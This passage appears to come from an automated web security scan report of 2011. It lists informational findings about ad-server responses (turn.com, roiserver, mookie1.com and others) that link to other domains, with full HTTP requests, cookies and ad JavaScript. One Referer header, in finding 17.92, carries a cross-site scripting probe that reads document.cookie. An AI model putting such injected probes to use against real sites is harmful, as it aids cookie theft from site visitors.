P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:55:09 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: pf=Mgovx84h_Ov--Xj3--F0rsLmce8wzSDXw3BvrEZAKNiJwV9kSIzX4BtZ7vBDkFqivBHW9RKwIdLIwhhMny1M2H4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:55:08 GMT
Content-Length: 10126


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
concept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n\n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=3636088819337780094?;click=http://r.turn.com/r/tpclick/id/fttlMIT7dTL47AUAbwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=3636088819337780094?;click=http://r.turn.com/r/tpclick/id/fttlMIT7dTL47AUAbwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...
888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/http://ad.doubleclick.net/jump/N5823.152304.TRADEDESK/B5157804.4;abr=!ie4;abr=!ie5;sz=728x90;ord=3636088819337780094?">\n<IMG SRC="http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.4;abr=!ie4;abr=!ie5;sz=728x90;ord=3636088819337780094?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.90. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /server/ads.js?&pub=6264177&code=14383603&cch=14381728&l=300x250&tmz=-6&area=0&res=1920&rnd=0.04441207833588123&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:03:23 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:03:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:03:23 GMT; Path=/
Set-Cookie: pf=V_hBBoSZrvzxwVsylnKaXvamneyvQhRVH4dyk1q1DU-JwV9kSIzX4BtZ7vBDkFqiiL8UzCzja6AU_RwAB28KJ34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:03:23 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:03:23 GMT
Content-Length: 10132


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
concept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n\n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...
95%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/http://ad.doubleclick.net/jump/N5823.152304.TRADEDESK/B5157804.5;abr=!ie4;abr=!ie5;sz=300x250;ord=4434400651657365963?">\n<IMG SRC="http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.5;abr=!ie4;abr=!ie5;sz=300x250;ord=4434400651657365963?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.91. http://ads.bluelithium.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Fri, 28 Jan 2011 21:57:38 GMT
Pragma: no-cache
Content-Length: 4542
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

17.92. http://ads.roiserver.com/disp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /disp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /disp?pid=0CC81D8&rand=90638474 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 4872
Date: Fri, 28 Jan 2011 14:14:36 GMT
Connection: close


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="Tue, 01 Jan 2000 12:12:12 GMT">

...[SNIP]...
<td class="adsBy">
<img src="http://roiserver.sitescout.netdna-cdn.com/roiserver.gif">
</td>
...[SNIP]...
<td class="tadHoriImg" onmouseover="this.style.cursor='pointer'" onclick="window.open('http://ads.roiserver.com/click?clid=e5656a6&rand=1296224076876&sid=', '_blank')">
<img src="http://roiserver.sitescout.netdna-cdn.com/acaiani-83234ed.gif" alt="1 Trick of a Tiny Belly:"/>
</td>
...[SNIP]...
<td class="tadHoriImg" onmouseover="this.style.cursor='pointer'" onclick="window.open('http://ads.roiserver.com/click?clid=2f9b4a3&rand=1296224076877&sid=', '_blank')">
<img src="http://roiserver.sitescout.netdna-cdn.com/fext/skin-2.jpg" alt="Dallas Mom&#146;s $5 Wrinkle Trick"/>
</td>
...[SNIP]...
<td class="tadHoriImg" onmouseover="this.style.cursor='pointer'" onclick="window.open('http://ads.roiserver.com/click?clid=7412644&rand=1296224076877&sid=', '_blank')">
<img src="http://roiserver.sitescout.netdna-cdn.com/teethani-a7612d7.gif" alt="Dallas Mom&#146;s Teeth Trick"/>
</td>
...[SNIP]...

17.93. http://adsfac.us/link.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /link.asp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /link.asp?cc=QAN007.310005.0&CreativeID=30281 HTTP/1.1
Host: adsfac.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: FSQAN007310005=uid=14877790; FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 276
Content-Type: text/html
Expires: Sat, 29 Jan 2011 05:19:26 GMT
Location: http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&utm_medium=listing&utm_source=QFOnineAds&utm_content=&utm_term=sydney
Server: Microsoft-IIS/7.0
Set-Cookie: FSQAN007=pctl=310005&FM30281=1&pdc=4045&pctc=30281&FQ=1&pctcrt=1&pctm=1&FL310005=1&fpt=0%2C310005%2C&pct%5Fdate=4045; expires=Tue, 01-Mar-2011 05:20:26 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&amp;utm_medium=listing&amp;utm_source=QFOnineAds&amp;utm_content=&amp;utm_term=sydney">here</a>
...[SNIP]...

17.94. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90?http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543^950189^81^0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.5;abr=!ie;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1940003036?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1940003036?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

17.95. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90?http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543^950189^81^0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1702617826/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1702617826?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.5;abr=!ie;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1702617826/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1702617826?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1702617826/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1702617826?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1702617826?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

17.96. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/353974624/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=353974624?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/353974624/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=353974624?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/353974624/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=353974624?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=353974624?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.97. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
